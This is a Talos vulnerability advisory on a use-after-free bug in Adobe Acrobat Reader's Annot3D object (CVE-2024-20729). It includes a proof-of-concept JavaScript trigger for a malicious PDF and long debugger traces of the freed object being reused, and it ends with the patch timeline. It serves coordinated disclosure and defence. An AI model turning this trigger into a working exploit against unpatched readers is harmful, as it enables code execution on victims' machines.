Talos Vulnerability Report

TALOS-2023-1890

Adobe Acrobat Reader Annot3D object zoom event use-after-free vulnerability

February 15, 2024
CVE Number

CVE-2024-20729

SUMMARY

A use-after-free vulnerability exists in the Annot3D functionality of Adobe Acrobat Reader 2023.006.20380. A specially crafted Javascript code inside a malicious PDF document can trigger reuse of a previously freed object, which can lead to memory corruption and could result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Adobe Acrobat Reader 2023.006.20380

PRODUCT URLS

Acrobat Reader - https://acrobat.adobe.com/us/en/acrobat/pdf-reader.html

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

DETAILS

Adobe Acrobat Reader is one of the most popular and feature-rich PDF readers on the market. It has a large user base and is usually a default PDF reader on systems. It also integrates into web browsers as a plugin for rendering PDFs.

Adobe’s PDF Reader creates an Annot3D object if a page contains a 3D type image. There exists a use-after-free vulnerability in the way Adobe Acrobat Reader handles an Annot3D object. This can be illustrated by the following proof-of-concept code:

function main() {
    main_run++;

    t = {toString:set_page} ; 

    app.activeDocs[0].getField('Text Field1').setFocus(); 

    app.activeDocs[0].getPageNthWordQuads(0, t); 

}


function set_page() {

    app.activeDocs[0].pageNum = 4; 

}

[..]
function zoomtype() {

    app.activeDocs[0].zoomType = zoomtype.fitV;

}

In the above excerpt, the toString property of the variable t is set to the callback function set_page. The callback triggers when the setFocus method is called. The set_page sets the page, which triggers zoomtype method. This call frees a number of objects, including the Annot3D object. The use-after-free vulnerability occurs when the freed Annot3D object is used without any validation. We can observe the following in the debugger (with PageHeap enabled):

eax=0fd60f00 ebx=0536d9d4 ecx=00000001 edx=07ca0000 esi=c0010000 edi=00000012
eip=6ebd2f79 esp=0536d8d4 ebp=0536d9c8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
AcroRd32!CTJPEGReader::operator=+0x2d6d9:
6ebd2f79 68b8010000      push    1B8h
0:000> p
eax=0fd60f00 ebx=0536d9d4 ecx=00000001 edx=07ca0000 esi=c0010000 edi=00000012
eip=6ebd2f7e esp=0536d8d0 ebp=0536d9c8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
AcroRd32!CTJPEGReader::operator=+0x2d6de:
6ebd2f7e e80944e4ff      call    AcroRd32!AcroWinMainSandbox+0x4abc (6ea1738c) ; <--------- (1)
0:000> p
eax=bb502e48 ebx=0536d9d4 ecx=00000001 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f83 esp=0536d8d0 ebp=0536d9c8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6e3:
6ebd2f83 59              pop     ecx
0:000> dd eax                                                                   ; <---------  (2)
bb502e48  00000000 00000000 00000000 00000000
bb502e58  00000000 00000000 00000000 00000000
bb502e68  00000000 00000000 00000000 00000000
bb502e78  00000000 00000000 00000000 00000000
bb502e88  00000000 00000000 00000000 00000000
bb502e98  00000000 00000000 00000000 00000000
bb502ea8  00000000 00000000 00000000 00000000
bb502eb8  00000000 00000000 00000000 00000000
0:000> p
eax=bb502e48 ebx=0536d9d4 ecx=000001b8 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f84 esp=0536d8d4 ebp=0536d9c8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6e4:
6ebd2f84 59              pop     ecx
0:000> p
eax=bb502e48 ebx=0536d9d4 ecx=00000001 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f85 esp=0536d8d8 ebp=0536d9c8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6e5:
6ebd2f85 8bc8            mov     ecx,eax
[...] 

0:000> p
eax=852e0f60 ebx=0536d9d4 ecx=bb502e48 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f98 esp=0536d8d4 ebp=0536d9c8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6f8:
6ebd2f98 ff7010          push    dword ptr [eax+10h]  ds:002b:852e0f70=8dc44eb0
0:000> p
eax=852e0f60 ebx=0536d9d4 ecx=bb502e48 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f9b esp=0536d8d0 ebp=0536d9c8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6fb:
6ebd2f9b 57              push    edi
0:000> p
eax=852e0f60 ebx=0536d9d4 ecx=bb502e48 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f9c esp=0536d8cc ebp=0536d9c8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6fc:
6ebd2f9c 56              push    esi
0:000> p
eax=852e0f60 ebx=0536d9d4 ecx=bb502e48 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f9d esp=0536d8c8 ebp=0536d9c8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6fd:
6ebd2f9d e86588c500      call    AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc037 (6f82b807) ; <----- (3)
0:000> p
eax=bb502e48 ebx=0536d9d4 ecx=6f82ba18 edx=07ca0000 esi=c0010000 edi=00000012
eip=6ebd2fa2 esp=0536d8d8 ebp=0536d9c8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
AcroRd32!CTJPEGReader::operator=+0x2d702:
6ebd2fa2 eb65            jmp     AcroRd32!CTJPEGReader::operator=+0x2d769 (6ebd3009)
0:000> dd bb502e48                                                                            ; <----- (4)
bb502e48  7043e3c8 00000000 00000000 ffffffff
bb502e58  00000000 00000000 00000000 00000000
bb502e68  00000000 00000000 00000000 00000000
bb502e78  00000000 00000000 00000000 00000002
bb502e88  8dc44eb0 bb508ff8 00000027 00000000
bb502e98  702da7e8 bb514fe8 00000000 00000000
bb502ea8  00000000 00000000 00000000 00000000
bb502eb8  00000000 00000000 00000000 00000000

At (1) above, a function is called which calls malloc to allocate an Annot3D object of the size 0x1B8. The initializiation of the Annot3D object happens by call at (3). We can observe the buffer value after the initializiation at (4).

0:000> u
AcroRd32!AIDE::PixelPartInfo::operator=+0x50432b:
6f833afb 8b8bbc000000    mov     ecx,dword ptr [ebx+0BCh]                            <------------------- (5)
6f833b01 0fb7f0          movzx   esi,ax
6f833b04 33c0            xor     eax,eax
6f833b06 50              push    eax
6f833b07 e82d4444ff      call    AcroRd32!CTJPEGReader::operator=+0xd2699 (6ec77f39)
6f833b0c 8b8bbc000000    mov     ecx,dword ptr [ebx+0BCh]
6f833b12 33c0            xor     eax,eax
6f833b14 85c9            test    ecx,ecx
0:000> p
eax=00000001 ebx=bb502e48 ecx=b080cdb8 edx=05110000 esi=00000000 edi=00000001
eip=6f833b01 esp=0536d660 ebp=0536d67c iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!AIDE::PixelPartInfo::operator=+0x504331:
6f833b01 0fb7f0          movzx   esi,ax
0:000> p
eax=00000001 ebx=bb502e48 ecx=b080cdb8 edx=05110000 esi=00000001 edi=00000001
eip=6f833b04 esp=0536d660 ebp=0536d67c iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!AIDE::PixelPartInfo::operator=+0x504334:
6f833b04 33c0            xor     eax,eax
0:000> p
eax=00000000 ebx=bb502e48 ecx=b080cdb8 edx=05110000 esi=00000001 edi=00000001
eip=6f833b06 esp=0536d660 ebp=0536d67c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x504336:
6f833b06 50              push    eax
0:000> p
eax=00000000 ebx=bb502e48 ecx=b080cdb8 edx=05110000 esi=00000001 edi=00000001
eip=6f833b07 esp=0536d65c ebp=0536d67c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x504337:
6f833b07 e82d4444ff      call    AcroRd32!CTJPEGReader::operator=+0xd2699 (6ec77f39) <--------------- [6]
[...]
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be4a esp=0536d280 ebp=0536d294 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc67a:
6f82be4a f6450801        test    byte ptr [ebp+8],1         ss:002b:0536d29c=01
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be4e esp=0536d280 ebp=0536d294 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc67e:
6f82be4e 7423            je      AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc6a3 (6f82be73) [br=0]
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be50 esp=0536d280 ebp=0536d294 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc680:
6f82be50 f6450804        test    byte ptr [ebp+8],4         ss:002b:0536d29c=01
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be54 esp=0536d280 ebp=0536d294 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc684:
6f82be54 7510            jne     AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc696 (6f82be66) [br=0]
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be56 esp=0536d280 ebp=0536d294 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc686:
6f82be56 8365fc00        and     dword ptr [ebp-4],0  ss:002b:0536d290=ffffffff
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be5a esp=0536d280 ebp=0536d294 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc68a:
6f82be5a 85f6            test    esi,esi
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be5c esp=0536d280 ebp=0536d294 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc68c:
6f82be5c 7415            je      AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc6a3 (6f82be73) [br=0]
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be5e esp=0536d280 ebp=0536d294 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc68e:
6f82be5e 56              push    esi                             <----------------------------------- [7]
0:000> dd esi
bb502e48  70169d20 00000000 00000000 ffffffff
bb502e58  00000000 00000000 00000000 00000006
bb502e68  00000002 00000008 00000001 00000001
bb502e78  00000000 00000000 00000000 00000002
bb502e88  8dc44eb0 bb508ff8 00000027 00000000
bb502e98  70169d20 bb514fe8 00000000 00000000
bb502ea8  00000000 00000000 00000000 00000000
bb502eb8  00000000 00000000 00000000 00000000
0:000> t
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be5f esp=0536d27c ebp=0536d294 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc68f:
6f82be5f e81cec1eff      call    AcroRd32!AcroWinMainSandbox+0x81b0 (6ea1aa80)
0:000> t
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6ea1aa80 esp=0536d278 ebp=0536d294 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!AcroWinMainSandbox+0x81b0:
6ea1aa80 55              push    ebp
0:000> pc
eax=70d0283c ebx=852e0f60 ecx=76dc3c50 edx=07ca0000 esi=76dc3c50 edi=bb502e48
eip=6ea1aa91 esp=0536d26c ebp=0536d274 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!AcroWinMainSandbox+0x81c1:
6ea1aa91 ff15a8471170    call    dword ptr [AcroRd32!AcroSecurityBailOutImpl+0x32fa88 (701147a8)] ds:002b:701147a8={ntdll!LdrpValidateUserCallTarget (77a988f0)}
0:000> pc
eax=0edb878a ebx=852e0f60 ecx=76dc3c50 edx=00810400 esi=76dc3c50 edi=bb502e48
eip=6ea1aa97 esp=0536d26c ebp=0536d274 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000247
AcroRd32!AcroWinMainSandbox+0x81c7:
6ea1aa97 ffd6            call    esi {ucrtbase!free (76dc3c50)}               <------------------------------ [8]
0:000> dd bb502e48                                                            <------------------------------ [9]
bb502e48  70169d20 00000000 00000000 ffffffff
bb502e58  00000000 00000000 00000000 00000006
bb502e68  00000002 00000008 00000001 00000001
bb502e78  00000000 00000000 00000000 00000002
bb502e88  8dc44eb0 bb508ff8 00000027 00000000
bb502e98  70169d20 bb514fe8 00000000 00000000
bb502ea8  00000000 00000000 00000000 00000000
bb502eb8  00000000 00000000 00000000 00000000
0:000> p
eax=00000001 ebx=852e0f60 ecx=07ca0000 edx=07ca0000 esi=76dc3c50 edi=bb502e48
eip=6ea1aa99 esp=0536d26c ebp=0536d274 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216
AcroRd32!AcroWinMainSandbox+0x81c9:                   
6ea1aa99 59              pop     ecx
0:000> dd bb502e48                                                                          <------------------------------ [10]
bb502e48  ???????? ???????? ???????? ????????
bb502e58  ???????? ???????? ???????? ????????
bb502e68  ???????? ???????? ???????? ????????
bb502e78  ???????? ???????? ???????? ????????
bb502e88  ???????? ???????? ???????? ????????
bb502e98  ???????? ???????? ???????? ????????
bb502ea8  ???????? ???????? ???????? ????????
bb502eb8  ???????? ???????? ???????? ????????
0:000> pt
eax=00000001 ebx=852e0f60 ecx=bb502e48 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6ea1aa9c esp=0536d278 ebp=0536d294 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216
AcroRd32!AcroWinMainSandbox+0x81cc:
6ea1aa9c c3              ret

At [5] above, the ebx register contains the vulnerable Annot3D buffer. The method called at [6] eventually calls free at [8]. The argument of the free function comes from the esi register at [7]. The value of the vulnerable buffer is examined at [9], and [10] shows its value before and after the free function is called. The vulnerable freed buffer is later used without any validation. This can be observed in a debugger at the time of the crash:

0:000> g
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=bb502e48 ecx=6ec7801f edx=00010000 esi=00000001 edi=00000001
eip=6f833b0c esp=0536d660 ebp=0536d67c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
AcroRd32!AIDE::PixelPartInfo::operator=+0x50433c:
6f833b0c 8b8bbc000000    mov     ecx,dword ptr [ebx+0BCh] ds:002b:bb502f04=????????

0:000> kb
 # ChildEBP RetAddr      Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0536d67c 6ebe9a42     8dc44eb0 00000009 bb502e48 AcroRd32!AIDE::PixelPartInfo::operator=+0x50433c
01 0536dbb4 6ebd22e6     8dc44eb0 00000009 a1c24494 AcroRd32!CTJPEGReader::operator=+0x441a2
02 0536dbf4 6f479f3e     8dc44eb0 00000001 6f479ea0 AcroRd32!CTJPEGReader::operator=+0x2ca46
03 0536dc1c 6ea8a20e     0536dcfc 8dc44eb0 0536dc98 AcroRd32!AIDE::PixelPartInfo::operator=+0x14a76e
04 0536dc2c 6ebcde76     00000000 0000088c a1c243f8 AcroRd32!DllCanUnloadNow+0x3f5ee
05 0536dc98 6ebc8745     0536dcfc a1c24240 8dc44eb0 AcroRd32!CTJPEGReader::operator=+0x285d6
06 0536dd20 6ebc8577     00000000 0536dd6c 8cef6f48 AcroRd32!CTJPEGReader::operator=+0x22ea5
07 0536dd34 6ec7bb5b     8dc44eb0 00000000 8cef6f48 AcroRd32!CTJPEGReader::operator=+0x22cd7
08 0536dd50 6ecb7a3a     8cef6f48 a1c242c4 8cef6f48 AcroRd32!CTJPEGReader::operator=+0xd62bb
09 0536dda4 6ecb7493     00000000 8cef6f48 00000000 AcroRd32!CTJPEGReader::operator=+0x11219a
0a 0536ddf8 6ebd5b86     00000001 a1c241c0 00000000 AcroRd32!CTJPEGReader::operator=+0x111bf3
0b 0536dea0 6ebc7d73     00000001 00000001 00000000 AcroRd32!CTJPEGReader::operator=+0x302e6
0c 0536def8 6ebd2544     00000000 6ebd2520 6ebd2510 AcroRd32!CTJPEGReader::operator=+0x224d3
0d 0536df14 6ebd104b     8dc44eb0 a1c240b8 8dc44eb0 AcroRd32!CTJPEGReader::operator=+0x2cca4
0e 0536dfd8 6ebd0934     00000001 6ebd0934 00000004 AcroRd32!CTJPEGReader::operator=+0x2b7ab
0f 0536dffc 8f445c90     8dc44eb0 00000004 000001ac AcroRd32!CTJPEGReader::operator=+0x2b094
10 0536e040 8f3fb0bb     8130cfb8 4e1ecff0 506b2ff0 EScript!PlugInMain+0x56820
11 0536e0ac 8f2e2009     8fc78000 0536e20c 0536e0cc EScript!PlugInMain+0xbc4b
12 0536e0f4 8f2b6ba1     8fc78000 0536e20c 0536e20c EScript!mozilla::HashBytes+0x36f99
13 0536e140 8f2b650b     8fc78000 0536e20c 0536e20c EScript!mozilla::HashBytes+0xbb31
14 0536e1e4 8f2dce6b     8fc78000 0536e20c 0536e20c EScript!mozilla::HashBytes+0xb49b
15 0536e224 8f2d5521     8fc78000 0536e264 8fccc4ce EScript!mozilla::HashBytes+0x31dfb
16 0536e3fc 8f2d372e     00000000 718baa1e 0536e404 EScript!mozilla::HashBytes+0x2a4b1
17 0536e428 8f2d368f     8fc78000 0536e438 8f4d2d98 EScript!mozilla::HashBytes+0x286be
18 0536e484 8f2d3503     8fc78000 0536e4ec 90129a10 EScript!mozilla::HashBytes+0x2861f
19 0536e4c0 8f2b8713     8fc78000 0536e4ec 90129a10 EScript!mozilla::HashBytes+0x28493
1a 0536e510 8f2f18bb     8fc78000 0536e558 00000000 EScript!mozilla::HashBytes+0xd6a3
1b 0536e594 8f40aebb     8fc78000 90129a10 8fc780c0 EScript!mozilla::HashBytes+0x4684b
1c 0536e748 8f40ab14     3fc0cff0 ce18efe0 509bcff0 EScript!PlugInMain+0x1ba4b
1d 0536e794 8f4098f3     3d170fc0 8130cfb8 dc4f0f40 EScript!PlugInMain+0x1b6a4
1e 0536e834 8f47671f     55c8ebc0 8130cfb8 d92def00 EScript!PlugInMain+0x1a483
1f 0536e894 6f35e120     00000000 c0010000 0000000c EScript!PlugInMain+0x872af
20 0536e92c 6f358e03     7a84ecf0 c0010000 0000000c AcroRd32!AIDE::PixelPartInfo::operator=+0x2e950
21 0536e97c 6f096fd7     c0010000 0000000c 0536ea28 AcroRd32!AIDE::PixelPartInfo::operator=+0x29633
22 0536e9ac 6f09754a     c0010000 0000000c 6f358db0 AcroRd32!ixVectorNextHit+0x16c767
23 0536ea00 6f35dd9c     c0010000 0000000c 6f358db0 AcroRd32!ixVectorNextHit+0x16ccda
24 0536eab0 6ec69998     7a84ecf0 c0010000 0000000c AcroRd32!AIDE::PixelPartInfo::operator=+0x2e5cc
25 0536eb48 6ec697bf     00000060 00000001 6ec697bf AcroRd32!CTJPEGReader::operator=+0xc40f8
26 0536eb68 6ec69741     8dc44eb0 00000001 2aa4af10 AcroRd32!CTJPEGReader::operator=+0xc3f1f
27 0536eb88 6ea970c6     6063cff8 a1c27480 2aa4af50 AcroRd32!CTJPEGReader::operator=+0xc3ea1
28 0536ebe0 6ea95cdf     004aafb2 a1c27318 1d3d3fd0 AcroRd32!DllCanUnloadNow+0x4c4a6
29 0536ec78 6ea9518a     004aafb2 6ea94f77 a1c273b0 AcroRd32!DllCanUnloadNow+0x4b0bf
2a 0536ecd0 6ea1d784     000004d3 00000000 00000113 AcroRd32!DllCanUnloadNow+0x4a56a
2b 0536ecec 75fb0eab     00060130 00000113 000004d3 AcroRd32!AcroWinMainSandbox+0xaeb4
2c 0536ed18 75fa7e5a     6ea1d280 00060130 00000113 USER32!_InternalCallWinProc+0x2b
2d 0536edfc 75fa5bca     6ea1d280 00000000 00000113 USER32!UserCallWinProcCheckWow+0x33a
2e 0536ee70 75fa5990     00000013 0536ee94 6ea94773 USER32!DispatchMessageWorker+0x22a
2f 0536ee7c 6ea94773     0536eeb0 1d3bdda8 1d3bdda8 USER32!DispatchMessageW+0x10
30 0536ee94 6ea9445e     0536eeb0 a1c27068 1d3bdda8 AcroRd32!DllCanUnloadNow+0x49b53
31 0536ef08 6ea94289     a1c27020 1d3bdda8 00000000 AcroRd32!DllCanUnloadNow+0x4983e
32 0536ef40 6ea13043     a1c270d4 0d466ff8 00000000 AcroRd32!DllCanUnloadNow+0x49669
33 0536efb4 6ea12a5f     6e870000 00af0000 0d466ff8 AcroRd32!AcroWinMainSandbox+0x773
34 0536f3d8 00cd59d0     6e870000 00af0000 0d466ff8 AcroRd32!AcroWinMainSandbox+0x18f
35 0536f78c 00d21efa     00af0000 00000000 07cc0018 AcroRd32_exe!IsSandboxedProcess+0x126030
36 0536f7d8 76eefcc9     05004000 76eefcb0 0536f844 AcroRd32_exe!AcroRd32IsBrokerProcess+0x1d54a
37 0536f7e8 77a77c6e     05004000 d8baf044 00000000 KERNEL32!BaseThreadInitThunk+0x19
38 0536f844 77a77c3e     ffffffff 77a98c32 00000000 ntdll!__RtlUserThreadStart+0x2f
39 0536f854 00000000     00cd1640 05004000 00000000 ntdll!_RtlUserThreadStart+0x1b

In the above debugger output, the crash occurs when ebx is dereferenced, as if it were an object pointer. Depending on the memory layout of the process, it may be possible to abuse this vulnerability for arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.

VENDOR RESPONSE

The vendor released a security bulletin at: https://helpx.adobe.com/security/products/acrobat/apsb24-07.html Patches can be found linked from this site

TIMELINE

2023-12-19 - Vendor Disclosure
2024-02-13 - Vendor Patch Release
2024-02-15 - Public Release

Credit

Discovered by KPC of Cisco Talos.